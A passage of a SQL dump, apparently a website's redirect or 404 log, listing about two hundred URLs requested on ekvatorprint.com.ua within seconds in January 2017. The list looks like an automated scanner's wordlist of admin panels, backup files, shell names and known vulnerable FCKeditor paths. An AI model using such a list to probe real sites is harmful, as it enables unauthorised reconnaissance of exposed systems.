13:26:42','0000-00-00 00:00:00',301),(4156,'http://ekvatorprint.com.ua/Administrator.shtml',NULL,'','',1,0,'2017-01-20 13:26:42','0000-00-00 00:00:00',301),(4157,'http://ekvatorprint.com.ua/AdvWorks/equipment/catalog_type.',NULL,'','',1,0,'2017-01-20 13:26:42','0000-00-00 00:00:00',301),(4158,'http://ekvatorprint.com.ua/Administrator.jsp',NULL,'','',1,0,'2017-01-20 13:26:42','0000-00-00 00:00:00',301),(4159,'http://ekvatorprint.com.ua/AlbumCatalogWeb',NULL,'','',1,0,'2017-01-20 13:26:42','0000-00-00 00:00:00',301),(4160,'http://ekvatorprint.com.ua/AlbumCatalogWeb/docs/',NULL,'','',1,0,'2017-01-20 13:26:42','0000-00-00 00:00:00',301),(4161,'http://ekvatorprint.com.ua/AlbumCatalogWeb/',NULL,'','',1,0,'2017-01-20 13:26:42','0000-00-00 00:00:00',301),(4162,'http://ekvatorprint.com.ua/AdminMain',NULL,'','',1,0,'2017-01-20 13:26:42','0000-00-00 00:00:00',301),(4163,'http://ekvatorprint.com.ua/AlbumCatalogWeb/docsservlet',NULL,'','',1,0,'2017-01-20 13:26:42','0000-00-00 00:00:00',301),(4164,'http://ekvatorprint.com.ua/AlbumCatalogWeb/docsservlet/',NULL,'','',1,0,'2017-01-20 13:26:42','0000-00-00 00:00:00',301),(4165,'http://ekvatorprint.com.ua/AlbumCatalogWebservlet/',NULL,'','',1,0,'2017-01-20 13:26:43','0000-00-00 00:00:00',301),(4166,'http://ekvatorprint.com.ua/AppServer',NULL,'','',1,0,'2017-01-20 13:26:43','0000-00-00 00:00:00',301),(4167,'http://ekvatorprint.com.ua/AlbumCatalogWebservlet',NULL,'','',1,0,'2017-01-20 13:26:43','0000-00-00 00:00:00',301),(4168,'http://ekvatorprint.com.ua/AppInstallStatusServlet',NULL,'','',1,0,'2017-01-20 13:26:43','0000-00-00 00:00:00',301),(4169,'http://ekvatorprint.com.ua/AppManagementStatus',NULL,'','',1,0,'2017-01-20 13:26:43','0000-00-00 00:00:00',301),(4170,'http://ekvatorprint.com.ua/ApplicationProfileSample',NULL,'','',1,0,'2017-01-20 13:26:43','0000-00-00 00:00:00',301),(4171,'http://ekvatorprint.com.ua/ApplicationProfileSample/docs/',NULL,'','',1,0,'2017-01-20 13:26:43','0000-00-00 00:00:00',301),(4172,'http://ekvatorprint.com.ua/App_Data',NULL,'','',1,0,'2017-01-20 13:26:43','0000-00-00 00:00:00',301),(4173,'http://ekvatorprint.com.ua/ApplicationProfileSample/',NULL,'','',1,0,'2017-01-20 13:26:43','0000-00-00 00:00:00',301),(4174,'http://ekvatorprint.com.ua/App_Code',NULL,'','',1,0,'2017-01-20 13:26:43','0000-00-00 00:00:00',301),(4175,'http://ekvatorprint.com.ua/ApplicationProfileSampleservlet',NULL,'','',1,0,'2017-01-20 13:26:43','0000-00-00 00:00:00',301),(4176,'http://ekvatorprint.com.ua/ApplicationProfileSampleservlet/',NULL,'','',1,0,'2017-01-20 13:26:43','0000-00-00 00:00:00',301),(4177,'http://ekvatorprint.com.ua/Articles.php',NULL,'','',1,0,'2017-01-20 13:26:43','0000-00-00 00:00:00',301),(4178,'http://ekvatorprint.com.ua/BBApp',NULL,'','',1,0,'2017-01-20 13:26:43','0000-00-00 00:00:00',301),(4179,'http://ekvatorprint.com.ua/Auth/',NULL,'','',1,0,'2017-01-20 13:26:43','0000-00-00 00:00:00',301),(4180,'http://ekvatorprint.com.ua/Bank/',NULL,'','',1,0,'2017-01-20 13:26:43','0000-00-00 00:00:00',301),(4181,'http://ekvatorprint.com.ua/Bank/services/Transfer_SEI/wsdl',NULL,'','',1,0,'2017-01-20 13:26:43','0000-00-00 00:00:00',301),(4182,'http://ekvatorprint.com.ua/Archi~1/',NULL,'','',1,0,'2017-01-20 13:26:43','0000-00-00 00:00:00',301),(4183,'http://ekvatorprint.com.ua/Bank/services/Transfer_SEI',NULL,'','',1,0,'2017-01-20 13:26:43','0000-00-00 00:00:00',301),(4184,'http://ekvatorprint.com.ua/Articles.',NULL,'','',1,0,'2017-01-20 13:26:43','0000-00-00 00:00:00',301),(4185,'http://ekvatorprint.com.ua/BigDump.php',NULL,'','',1,0,'2017-01-20 13:26:43','0000-00-00 00:00:00',301),(4186,'http://ekvatorprint.com.ua/BeenThere',NULL,'','',1,0,'2017-01-20 13:26:43','0000-00-00 00:00:00',301),(4187,'http://ekvatorprint.com.ua/BigDump.',NULL,'','',1,0,'2017-01-20 13:26:43','0000-00-00 00:00:00',301),(4188,'http://ekvatorprint.com.ua/BigDump/',NULL,'','',1,0,'2017-01-20 13:26:43','0000-00-00 00:00:00',301),(4189,'http://ekvatorprint.com.ua/Bigdump.php',NULL,'','',1,0,'2017-01-20 13:26:43','0000-00-00 00:00:00',301),(4190,'http://ekvatorprint.com.ua/BizTalkServer',NULL,'','',1,0,'2017-01-20 13:26:43','0000-00-00 00:00:00',301),(4191,'http://ekvatorprint.com.ua/Bigdump.',NULL,'','',1,0,'2017-01-20 13:26:43','0000-00-00 00:00:00',301),(4192,'http://ekvatorprint.com.ua/Black.php',NULL,'','',1,0,'2017-01-20 13:26:43','0000-00-00 00:00:00',301),(4193,'http://ekvatorprint.com.ua/Bin/',NULL,'','',1,0,'2017-01-20 13:26:43','0000-00-00 00:00:00',301),(4194,'http://ekvatorprint.com.ua/Blog',NULL,'','',1,0,'2017-01-20 13:26:43','0000-00-00 00:00:00',301),(4195,'http://ekvatorprint.com.ua/Brocfile.coffee',NULL,'','',1,0,'2017-01-20 13:26:43','0000-00-00 00:00:00',301),(4196,'http://ekvatorprint.com.ua/BingSiteAuth.xml',NULL,'','',1,0,'2017-01-20 13:26:43','0000-00-00 00:00:00',301),(4197,'http://ekvatorprint.com.ua/Bootstrap',NULL,'','',1,0,'2017-01-20 13:26:43','0000-00-00 00:00:00',301),(4198,'http://ekvatorprint.com.ua/Brocfile.js',NULL,'','',1,0,'2017-01-20 13:26:44','0000-00-00 00:00:00',301),(4199,'http://ekvatorprint.com.ua/CFIDE/scripts/ajax/FCKeditor',NULL,'','',1,0,'2017-01-20 13:26:44','0000-00-00 00:00:00',301),(4200,'http://ekvatorprint.com.ua/CFIDE',NULL,'','',1,0,'2017-01-20 13:26:44','0000-00-00 00:00:00',301),(4201,'http://ekvatorprint.com.ua/CFIDE/Administrator/startstop.html',NULL,'','',1,0,'2017-01-20 13:26:44','0000-00-00 00:00:00',301),(4202,'http://ekvatorprint.com.ua/CHANGELOG',NULL,'','',1,0,'2017-01-20 13:26:44','0000-00-00 00:00:00',301),(4203,'http://ekvatorprint.com.ua/CGI-BIN/',NULL,'','',1,0,'2017-01-20 13:26:44','0000-00-00 00:00:00',301),(4204,'http://ekvatorprint.com.ua/CFIDE/Administrator/',NULL,'','',1,0,'2017-01-20 13:26:44','0000-00-00 00:00:00',301),(4205,'http://ekvatorprint.com.ua/CHANGELOG.TXT',NULL,'','',1,0,'2017-01-20 13:26:44','0000-00-00 00:00:00',301),(4206,'http://ekvatorprint.com.ua/CHANGELOG.LOG',NULL,'','',1,0,'2017-01-20 13:26:44','0000-00-00 00:00:00',301),(4207,'http://ekvatorprint.com.ua/CHANGELOG.log',NULL,'','',1,0,'2017-01-20 13:26:44','0000-00-00 00:00:00',301),(4208,'http://ekvatorprint.com.ua/CHANGELOG.txt',NULL,'','',4,0,'2017-01-20 13:26:44','0000-00-00 00:00:00',301),(4209,'http://ekvatorprint.com.ua/CHANGELOG.md',NULL,'','',1,0,'2017-01-20 13:26:44','0000-00-00 00:00:00',301),(4210,'http://ekvatorprint.com.ua/CHANGES',NULL,'','',1,0,'2017-01-20 13:26:44','0000-00-00 00:00:00',301),(4211,'http://ekvatorprint.com.ua/COPYING',NULL,'','',1,0,'2017-01-20 13:26:44','0000-00-00 00:00:00',301),(4212,'http://ekvatorprint.com.ua/CMS',NULL,'','',1,0,'2017-01-20 13:26:44','0000-00-00 00:00:00',301),(4213,'http://ekvatorprint.com.ua/CHANGES.html',NULL,'','',1,0,'2017-01-20 13:26:44','0000-00-00 00:00:00',301),(4214,'http://ekvatorprint.com.ua/CHANGES.txt',NULL,'','',1,0,'2017-01-20 13:26:44','0000-00-00 00:00:00',301),(4215,'http://ekvatorprint.com.ua/CREDITS',NULL,'','',1,0,'2017-01-20 13:26:44','0000-00-00 00:00:00',301),(4216,'http://ekvatorprint.com.ua/COadmin',NULL,'','',1,0,'2017-01-20 13:26:44','0000-00-00 00:00:00',301),(4217,'http://ekvatorprint.com.ua/CSV',NULL,'','',1,0,'2017-01-20 13:26:44','0000-00-00 00:00:00',301),(4218,'http://ekvatorprint.com.ua/CVS',NULL,'','',1,0,'2017-01-20 13:26:44','0000-00-00 00:00:00',301),(4219,'http://ekvatorprint.com.ua/Cgishell.pl',NULL,'','',1,0,'2017-01-20 13:26:44','0000-00-00 00:00:00',301),(4220,'http://ekvatorprint.com.ua/CVS/',NULL,'','',1,0,'2017-01-20 13:26:44','0000-00-00 00:00:00',301),(4221,'http://ekvatorprint.com.ua/Capfile',NULL,'','',1,0,'2017-01-20 13:26:44','0000-00-00 00:00:00',301),(4222,'http://ekvatorprint.com.ua/Cakefile',NULL,'','',1,0,'2017-01-20 13:26:44','0000-00-00 00:00:00',301),(4223,'http://ekvatorprint.com.ua/CVS/Root',NULL,'','',1,0,'2017-01-20 13:26:44','0000-00-00 00:00:00',301),(4224,'http://ekvatorprint.com.ua/Certificate',NULL,'','',1,0,'2017-01-20 13:26:44','0000-00-00 00:00:00',301),(4225,'http://ekvatorprint.com.ua/ChangeLog.txt',NULL,'','',1,0,'2017-01-20 13:26:44','0000-00-00 00:00:00',301),(4226,'http://ekvatorprint.com.ua/ChangeLog',NULL,'','',1,0,'2017-01-20 13:26:44','0000-00-00 00:00:00',301),(4227,'http://ekvatorprint.com.ua/Changelog.txt',NULL,'','',1,0,'2017-01-20 13:26:44','0000-00-00 00:00:00',301),(4228,'http://ekvatorprint.com.ua/Citrix//AccessPlatform/auth/clientscripts/cookies.js',NULL,'','',1,0,'2017-01-20 13:26:44','0000-00-00 00:00:00',301),(4229,'http://ekvatorprint.com.ua/Citrix/AccessPlatform/auth/clientscripts/login.js',NULL,'','',1,0,'2017-01-20 13:26:44','0000-00-00 00:00:00',301),(4230,'http://ekvatorprint.com.ua/Citrix/PNAgent/config.xml',NULL,'','',1,0,'2017-01-20 13:26:45','0000-00-00 00:00:00',301),(4231,'http://ekvatorprint.com.ua/Classpath/',NULL,'','',1,0,'2017-01-20 13:26:45','0000-00-00 00:00:00',301),(4232,'http://ekvatorprint.com.ua/ClientAccessPolicy.xml',NULL,'','',1,0,'2017-01-20 13:26:45','0000-00-00 00:00:00',301),(4233,'http://ekvatorprint.com.ua/Config/',NULL,'','',1,0,'2017-01-20 13:26:45','0000-00-00 00:00:00',301),(4234,'http://ekvatorprint.com.ua/ClusterRollout',NULL,'','',1,0,'2017-01-20 13:26:45','0000-00-00 00:00:00',301),(4235,'http://ekvatorprint.com.ua/ConsoleHelp',NULL,'','',1,0,'2017-01-20 13:26:45','0000-00-00 00:00:00',301),(4236,'http://ekvatorprint.com.ua/ControllerServlet',NULL,'','',1,0,'2017-01-20 13:26:45','0000-00-00 00:00:00',301),(4237,'http://ekvatorprint.com.ua/Connections',NULL,'','',1,0,'2017-01-20 13:26:45','0000-00-00 00:00:00',301),(4238,'http://ekvatorprint.com.ua/ConsoleHelp/',NULL,'','',1,0,'2017-01-20 13:26:45','0000-00-00 00:00:00',301),(4239,'http://ekvatorprint.com.ua/Config',NULL,'','',1,0,'2017-01-20 13:26:45','0000-00-00 00:00:00',301),(4240,'http://ekvatorprint.com.ua/CookieExample',NULL,'','',1,0,'2017-01-20 13:26:45','0000-00-00 00:00:00',301),(4241,'http://ekvatorprint.com.ua/Counter',NULL,'','',1,0,'2017-01-20 13:26:45','0000-00-00 00:00:00',301),(4242,'http://ekvatorprint.com.ua/Cpanel.php',NULL,'','',1,0,'2017-01-20 13:26:45','0000-00-00 00:00:00',301),(4243,'http://ekvatorprint.com.ua/DB',NULL,'','',1,0,'2017-01-20 13:26:45','0000-00-00 00:00:00',301),(4244,'http://ekvatorprint.com.ua/DAD',NULL,'','',1,0,'2017-01-20 13:26:45','0000-00-00 00:00:00',301),(4245,'http://ekvatorprint.com.ua/Database_Backup/',NULL,'','',1,0,'2017-01-20 13:26:45','0000-00-00 00:00:00',301),(4246,'http://ekvatorprint.com.ua/DP',NULL,'','',1,0,'2017-01-20 13:26:45','0000-00-00 00:00:00',301),(4247,'http://ekvatorprint.com.ua/DefaultWebApp',NULL,'','',1,0,'2017-01-20 13:26:45','0000-00-00 00:00:00',301),(4248,'http://ekvatorprint.com.ua/DateServlet',NULL,'','',1,0,'2017-01-20 13:26:45','0000-00-00 00:00:00',301),(4249,'http://ekvatorprint.com.ua/Default',NULL,'','',1,0,'2017-01-20 13:26:45','0000-00-00 00:00:00',301),(4250,'http://ekvatorprint.com.ua/Desktop.ini',NULL,'','',1,0,'2017-01-20 13:26:45','0000-00-00 00:00:00',301),(4251,'http://ekvatorprint.com.ua/Download',NULL,'','',1,0,'2017-01-20 13:26:45','0000-00-00 00:00:00',301),(4252,'http://ekvatorprint.com.ua/Downloads',NULL,'','',1,0,'2017-01-20 13:26:45','0000-00-00 00:00:00',301),(4253,'http://ekvatorprint.com.ua/Drupal',NULL,'','',1,0,'2017-01-20 13:26:45','0000-00-00 00:00:00',301),(4254,'http://ekvatorprint.com.ua/DynaCacheESI',NULL,'','',1,0,'2017-01-20 13:26:45','0000-00-00 00:00:00',301),(4255,'http://ekvatorprint.com.ua/DynaCacheESI/esiInavlidator',NULL,'','',1,0,'2017-01-20 13:26:45','0000-00-00 00:00:00',301),(4256,'http://ekvatorprint.com.ua/DynamicQuery/EmployeeFinder',NULL,'','',1,0,'2017-01-20 13:26:45','0000-00-00 00:00:00',301),(4257,'http://ekvatorprint.com.ua/ErrorPage.htm',NULL,'','',1,0,'2017-01-20 13:26:45','0000-00-00 00:00:00',301),(4258,'http://ekvatorprint.com.ua/EWbutton_Community',NULL,'','',1,0,'2017-01-20 13:26:45','0000-00-00 00:00:00',301),(4259,'http://ekvatorprint.com.ua/EWbutton_GuestBook',NULL,'','',1,0,'2017-01-20 13:26:45','0000-00-00 00:00:00',301),(4260,'http://ekvatorprint.com.ua/ErrorReporter',NULL,'','',1,0,'2017-01-20 13:26:45','0000-00-00 00:00:00',301),(4261,'http://ekvatorprint.com.ua/ErrorServlet',NULL,'','',1,0,'2017-01-20 13:26:45','0000-00-00 00:00:00',301),(4262,'http://ekvatorprint.com.ua/Estadisticas/',NULL,'','',1,0,'2017-01-20 13:26:45','0000-00-00 00:00:00',301),(4263,'http://ekvatorprint.com.ua/EuropeMirror',NULL,'','',1,0,'2017-01-20 13:26:45','0000-00-00 00:00:00',301),(4264,'http://ekvatorprint.com.ua/Exadmin/',NULL,'','',1,0,'2017-01-20 13:26:45','0000-00-00 00:00:00',301),(4265,'http://ekvatorprint.com.ua/Exchange',NULL,'','',1,0,'2017-01-20 13:26:46','0000-00-00 00:00:00',301),(4266,'http://ekvatorprint.com.ua/ExchWeb/',NULL,'','',1,0,'2017-01-20 13:26:46','0000-00-00 00:00:00',301),(4267,'http://ekvatorprint.com.ua/Exchange/',NULL,'','',1,0,'2017-01-20 13:26:46','0000-00-00 00:00:00',301),(4268,'http://ekvatorprint.com.ua/FCKeditor/',NULL,'','',1,0,'2017-01-20 13:26:46','0000-00-00 00:00:00',301),(4269,'http://ekvatorprint.com.ua/FCKeditor2.2/',NULL,'','',1,0,'2017-01-20 13:26:46','0000-00-00 00:00:00',301),(4270,'http://ekvatorprint.com.ua/FCKeditor',NULL,'','',1,0,'2017-01-20 13:26:46','0000-00-00 00:00:00',301),(4271,'http://ekvatorprint.com.ua/FAQ',NULL,'','',1,0,'2017-01-20 13:26:46','0000-00-00 00:00:00',301),(4272,'http://ekvatorprint.com.ua/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php',NULL,'','',1,0,'2017-01-20 13:26:46','0000-00-00 00:00:00',301),(4273,'http://ekvatorprint.com.ua/FCKeditor2.1/',NULL,'','',1,0,'2017-01-20 13:26:46','0000-00-00 00:00:00',301),(4274,'http://ekvatorprint.com.ua/FCKeditor2.0/',NULL,'','',1,0,'2017-01-20 13:26:46','0000-00-00 00:00:00',301),(4275,'http://ekvatorprint.com.ua/FCKeditor2/',NULL,'','',1,0,'2017-01-20 13:26:46','0000-00-00 00:00:00',301),(4276,'http://ekvatorprint.com.ua/FCKeditor2.3/',NULL,'','',1,0,'2017-01-20 13:26:46','0000-00-00 00:00:00',301),(4277,'http://ekvatorprint.com.ua/FCKeditor2.4/',NULL,'','',1,0,'2017-01-20 13:26:46','0000-00-00 00:00:00',301),(4278,'http://ekvatorprint.com.ua/FCKeditor22/',NULL,'','',1,0,'2017-01-20 13:26:46','0000-00-00 00:00:00',301),(4279,'http://ekvatorprint.com.ua/FCKeditor23/',NULL,'','',1,0,'2017-01-20 13:26:46','0000-00-00 00:00:00',301),(4280,'http://ekvatorprint.com.ua/FCKeditor20/',NULL,'','',1,0,'2017-01-20 13:26:46','0000-00-00 00:00:00',301),(4281,'http://ekvatorprint.com.ua/FileHandler.php',NULL,'','',1,0,'2017-01-20 13:26:46','0000-00-00 00:00:00',301),(4282,'http://ekvatorprint.com.ua/FCKeditor24/',NULL,'','',1,0,'2017-01-20 13:26:46','0000-00-00 00:00:00',301),(4283,'http://ekvatorprint.com.ua/FileTransfer',NULL,'','',1,0,'2017-01-20 13:26:46','0000-00-00 00:00:00',301),(4284,'http://ekvatorprint.com.ua/FCKeditor21/',NULL,'','',1,0,'2017-01-20 13:26:46','0000-00-00 00:00:00',301),(4285,'http://ekvatorprint.com.ua/FileHandler.',NULL,'','',1,0,'2017-01-20 13:26:46','0000-00-00 00:00:00',301),(4286,'http://ekvatorprint.com.ua/FireFox_Reco',NULL,'','',1,0,'2017-01-20 13:26:46','0000-00-00 00:00:00',301),(4287,'http://ekvatorprint.com.ua/FileHandler/',NULL,'','',1,0,'2017-01-20 13:26:46','0000-00-00 00:00:00',301),(4288,'http://ekvatorprint.com.ua/GalleryMenu',NULL,'','',1,0,'2017-01-20 13:26:46','0000-00-00 00:00:00',301),(4289,'http://ekvatorprint.com.ua/Gemfile.lock',NULL,'','',1,0,'2017-01-20 13:26:46','0000-00-00 00:00:00',301),(4290,'http://ekvatorprint.com.ua/Greenhouse',NULL,'','',1,0,'2017-01-20 13:26:46','0000-00-00 00:00:00',301),(4291,'http://ekvatorprint.com.ua/FirmConnect.php',NULL,'','',1,0,'2017-01-20 13:26:47','0000-00-00 00:00:00',301),(4292,'http://ekvatorprint.com.ua/Gemfile',NULL,'','',1,0,'2017-01-20 13:26:47','0000-00-00 00:00:00',301),(4293,'http://ekvatorprint.com.ua/FirmConnect.',NULL,'','',1,0,'2017-01-20 13:26:47','0000-00-00 00:00:00',301),(4294,'http://ekvatorprint.com.ua/Global.asa.bak',NULL,'','',1,0,'2017-01-20 13:26:47','0000-00-00 00:00:00',301),(4295,'http://ekvatorprint.com.ua/GreenhouseByWebSphere/docs/',NULL,'','',1,0,'2017-01-20 13:26:47','0000-00-00 00:00:00',301),(4296,'http://ekvatorprint.com.ua/Global.asax.bak',NULL,'','',1,0,'2017-01-20 13:26:47','0000-00-00 00:00:00',301),(4297,'http://ekvatorprint.com.ua/Greenhouse/',NULL,'','',1,0,'2017-01-20 13:26:47','0000-00-00 00:00:00',301),(4298,'http://ekvatorprint.com.ua/GreenhouseEJB/services/GreenhouseFront',NULL,'','',1,0,'2017-01-20 13:26:47','0000-00-00 00:00:00',301),(4299,'http://ekvatorprint.com.ua/GreenhouseEJB/',NULL,'','',1,0,'2017-01-20 13:26:47','0000-00-00 00:00:00',301),(4300,'http://ekvatorprint.com.ua/GreenhouseEJB/services/GreenhouseFront/wsdl/',NULL,'','',1,0,'2017-01-20 13:26:47','0000-00-00 00:00:00',301),(4301,'http://ekvatorprint.com.ua/GreenhouseWebservlet/',NULL,'','',1,0,'2017-01-20 13:26:47','0000-00-00 00:00:00',301),(4302,'http://ekvatorprint.com.ua/GreenhouseWeb',NULL,'','',1,0,'2017-01-20 13:26:47','0000-00-00 00:00:00',301),(4303,'http://ekvatorprint.com.ua/GreenhouseWebservlet',NULL,'','',1,0,'2017-01-20 13:26:47','0000-00-00 00:00:00',301),(4304,'http://ekvatorprint.com.ua/GreenhouseWeb/',NULL,'','',1,0,'2017-01-20 13:26:47','0000-00-00 00:00:00',301),(4305,'http://ekvatorprint.com.ua/Gruntfile.coffee',NULL,'','',1,0,'2017-01-20 13:26:47','0000-00-00 00:00:00',301),(4306,'http://ekvatorprint.com.ua/Greenhouseservlet/',NULL,'','',1,0,'2017-01-20 13:26:47','0000-00-00 00:00:00',301),(4307,'http://ekvatorprint.com.ua/Gruntfile.js',NULL,'','',1,0,'2017-01-20 13:26:47','0000-00-00 00:00:00',301),(4308,'http://ekvatorprint.com.ua/HFM/Administration/',NULL,'','',1,0,'2017-01-20 13:26:47','0000-00-00 00:00:00',301),(4309,'http://ekvatorprint.com.ua/Greenhouseservlet',NULL,'','',1,0,'2017-01-20 13:26:47','0000-00-00 00:00:00',301),(4310,'http://ekvatorprint.com.ua/HISTORY.txt',NULL,'','',1,0,'2017-01-20 13:26:47','0000-00-00 00:00:00',301),(4311,'http://ekvatorprint.com.ua/HISTORY',NULL,'','',1,0,'2017-01-20 13:26:47','0000-00-00 00:00:00',301),(4312,'http://ekvatorprint.com.ua/HISTORY.md',NULL,'','',1,0,'2017-01-20 13:26:47','0000-00-00 00:00:00',301),(4313,'http://ekvatorprint.com.ua/HTMLDB',NULL,'','',1,0,'2017-01-20 13:26:47','0000-00-00 00:00:00',301),(4314,'http://ekvatorprint.com.ua/HTTPClntLogin',NULL,'','',1,0,'2017-01-20 13:26:47','0000-00-00 00:00:00',301),(4315,'http://ekvatorprint.com.ua/HTTPClntClose',NULL,'','',1,0,'2017-01-20 13:26:47','0000-00-00 00:00:00',301),(4316,'http://ekvatorprint.com.ua/HTTPClntSend',NULL,'','',1,0,'2017-01-20 13:26:47','0000-00-00 00:00:00',301),(4317,'http://ekvatorprint.com.ua/HTTPClntRecv',NULL,'','',1,0,'2017-01-20 13:26:47','0000-00-00 00:00:00',301),(4318,'http://ekvatorprint.com.ua/HelloHTMLError.jsp',NULL,'','',1,0,'2017-01-20 13:26:47','0000-00-00 00:00:00',301),(4319,'http://ekvatorprint.com.ua/HelloHTML.jsp',NULL,'','',1,0,'2017-01-20 13:26:47','0000-00-00 00:00:00',301),(4320,'http://ekvatorprint.com.ua/HelloVXML.jsp',NULL,'','',1,0,'2017-01-20 13:26:47','0000-00-00 00:00:00',301),(4321,'http://ekvatorprint.com.ua/HelloVXMLError.jsp',NULL,'','',1,0,'2017-01-20 13:26:47','0000-00-00 00:00:00',301),(4322,'http://ekvatorprint.com.ua/HelloPervasive',NULL,'','',1,0,'2017-01-20 13:26:47','0000-00-00 00:00:00',301),(4323,'http://ekvatorprint.com.ua/HelloWMLError.jsp',NULL,'','',1,0,'2017-01-20 13:26:48','0000-00-00 00:00:00',301),(4324,'http://ekvatorprint.com.ua/HelloWML.jsp',NULL,'','',1,0,'2017-01-20 13:26:48','0000-00-00 00:00:00',301),(4325,'http://ekvatorprint.com.ua/HelloWorld',NULL,'','',1,0,'2017-01-20 13:26:48','0000-00-00 00:00:00',301),(4326,'http://ekvatorprint.com.ua/HitCount',NULL,'','',1,0,'2017-01-20 13:26:48','0000-00-00 00:00:00',301),(4327,'http://ekvatorprint.com.ua/HelloWorldServlet',NULL,'','',1,0,'2017-01-20 13:26:48','0000-00-00 00:00:00',301),(4328,'http://ekvatorprint.com.ua/HitCount.jsp',NULL,'','',1,0,'2017-01-20 13:26:48','0000-00-00 00:00:00',301),(4329,'http://ekvatorprint.com.ua/INSTALL.htm',NULL,'','',1,0,'2017-01-20 13:26:48','0000-00-00 00:00:00',301),(4330,'http://ekvatorprint.com.ua/IBMDefaultErrorReporter',NULL,'','',1,0,'2017-01-20 13:26:48','0000-00-00 00:00:00',301),(4331,'http://ekvatorprint.com.ua/INSTALL.TXT',NULL,'','',1,0,'2017-01-20 13:26:48','0000-00-00 00:00:00',301),(4332,'http://ekvatorprint.com.ua/IBMWebAS',NULL,'','',1,0,'2017-01-20 13:26:48','0000-00-00 00:00:00',301),(4333,'http://ekvatorprint.com.ua/INDEX.PHP',NULL,'','',1,0,'2017-01-20 13:26:48','0000-00-00 00:00:00',301),(4334,'http://ekvatorprint.com.ua/INSTALL',NULL,'','',1,0,'2017-01-20 13:26:48','0000-00-00 00:00:00',301),(4335,'http://ekvatorprint.com.ua/INSTALL.md',NULL,'','',1,0,'2017-01-20 13:26:48','0000-00-00 00:00:00',301),(4336,'http://ekvatorprint.com.ua/INSTALL.html',NULL,'','',1,0,'2017-01-20 13:26:48','0000-00-00 00:00:00',301),(4337,'http://ekvatorprint.com.ua/INSTALL.mysql',NULL,'','',1,0,'2017-01-20 13:26:48','0000-00-00 00:00:00',301),(4338,'http://ekvatorprint.com.ua/INSTALL.txt',NULL,'','',1,0,'2017-01-20 13:26:48','0000-00-00 00:00:00',301),(4339,'http://ekvatorprint.com.ua/INSTALL.mysql.txt',NULL,'','',1,0,'2017-01-20 13:26:48','0000-00-00 00:00:00',301),(4340,'http://ekvatorprint.com.ua/INSTALL.pgsql',NULL,'','',1,0,'2017-01-20 13:26:48','0000-00-00 00:00:00',301),(4341,'http://ekvatorprint.com.ua/INSTALL.pgsql.txt',NULL,'','',1,0,'2017-01-20 13:26:48','0000-00-00 00:00:00',301),(4342,'http://ekvatorprint.com.ua/Images',NULL,'','',1,0,'2017-01-20 13:26:48','0000-00-00 00:00:00',301),(4343,'http://ekvatorprint.com.ua/Index',NULL,'','',1,0,'2017-01-20 13:26:48','0000-00-00 00:00:00',301),(4344,'http://ekvatorprint.com.ua/INSTALL_admin',NULL,'','',1,0,'2017-01-20 13:26:48','0000-00-00 00:00:00',301),(4345,'http://ekvatorprint.com.ua/Install.txt',NULL,'','',1,0,'2017-01-20 13:26:48','0000-00-00 00:00:00',301),(4346,'http://ekvatorprint.com.ua/Install_dotCMS_Release.txt',NULL,'','',1,0,'2017-01-20 13:26:48','0000-00-00 00:00:00',301),(4347,'http://ekvatorprint.com.ua/Install',NULL,'','',1,0,'2017-01-20 13:26:48','0000-00-00 00:00:00',301),(4348,'http://ekvatorprint.com.ua/JTAExtensionsSamples/docs/',NULL,'','',1,0,'2017-01-20 13:26:48','0000-00-00 00:00:00',301),(4349,'http://ekvatorprint.com.ua/JTAExtensionsSamples/TransactionTracker',NULL,'','',1,0,'2017-01-20 13:26:48','0000-00-00 00:00:00',301),(4350,'http://ekvatorprint.com.ua/JTAExtensionsSamples/TransactionTracker/',NULL,'','',1,0,'2017-01-20 13:26:48','0000-00-00 00:00:00',301),(4351,'http://ekvatorprint.com.ua/L3b.php',NULL,'','',1,0,'2017-01-20 13:26:48','0000-00-00 00:00:00',301),(4352,'http://ekvatorprint.com.ua/Library',NULL,'','',1,0,'2017-01-20 13:26:49','0000-00-00 00:00:00',301),(4353,'http://ekvatorprint.com.ua/Jakefile',NULL,'','',1,0,'2017-01-20 13:26:49','0000-00-00 00:00:00',301),(4354,'http://ekvatorprint.com.ua/Joomla',NULL,'','',1,0,'2017-01-20 13:26:49','0000-00-00 00:00:00',301),(4355,'http://ekvatorprint.com.ua/LOG/',NULL,'','',1,0,'2017-01-20 13:26:49','0000-00-00 00:00:00',301),(4356,'http://ekvatorprint.com.ua/License.txt',NULL,'','',1,0,'2017-01-20 13:26:49','0000-00-00 00:00:00',301),(4357,'http://ekvatorprint.com.ua/LOGS/',NULL,'','',1,0,'2017-01-20 13:26:49','0000-00-00 00:00:00',301),(4358,'http://ekvatorprint.com.ua/Log-In/',NULL,'','',1,0,'2017-01-20 13:26:49','0000-00-00 00:00:00',301),(4359,'http://ekvatorprint.com.ua/Log-in/',NULL,'','',1,0,'2017-01-20 13:26:49','0000-00-00 00:00:00',301),(4360,'http://ekvatorprint.com.ua/LogfileTail',NULL,'','',1,0,'2017-01-20 13:26:49','0000-00-00 00:00:00',301),(4361,'http://ekvatorprint.com.ua/LogfileSearch',NULL,'','',1,0,'2017-01-20 13:26:49','0000-00-00 00:00:00',301),(4362,'http://ekvatorprint.com.ua/Logfiles/',NULL,'','',1,0,'2017-01-20 13:26:49','0000-00-00 00:00:00',301),(4363,'http://ekvatorprint.com.ua/Login',NULL,'','',1,0,'2017-01-20 13:26:49','0000-00-00 00:00:00',301),(4364,'http://ekvatorprint.com.ua/Login.',NULL,'','',1,0,'2017-01-20 13:26:49','0000-00-00 00:00:00',301),(4365,'http://ekvatorprint.com.ua/Login.cgi',NULL,'','',1,0,'2017-01-20 13:26:49','0000-00-00 00:00:00',301),(4366,'http://ekvatorprint.com.ua/Login.htm',NULL,'','',1,0,'2017-01-20 13:26:49','0000-00-00 00:00:00',301),(4367,'http://ekvatorprint.com.ua/Login.php',NULL,'','',1,0,'2017-01-20 13:26:49','0000-00-00 00:00:00',301),(4368,'http://ekvatorprint.com.ua/Login.html',NULL,'','',1,0,'2017-01-20 13:26:49','0000-00-00 00:00:00',301),(4369,'http://ekvatorprint.com.ua/Login.pl',NULL,'','',1,0,'2017-01-20 13:26:49','0000-00-00 00:00:00',301),(4370,'http://ekvatorprint.com.ua/Login.jsp',NULL,'','',1,0,'2017-01-20 13:26:49','0000-00-00 00:00:00',301),(4371,'http://ekvatorprint.com.ua/Login.py',NULL,'','',1,0,'2017-01-20 13:26:49','0000-00-00 00:00:00',301),(4372,'http://ekvatorprint.com.ua/Login.rb',NULL,'','',1,0,'2017-01-20 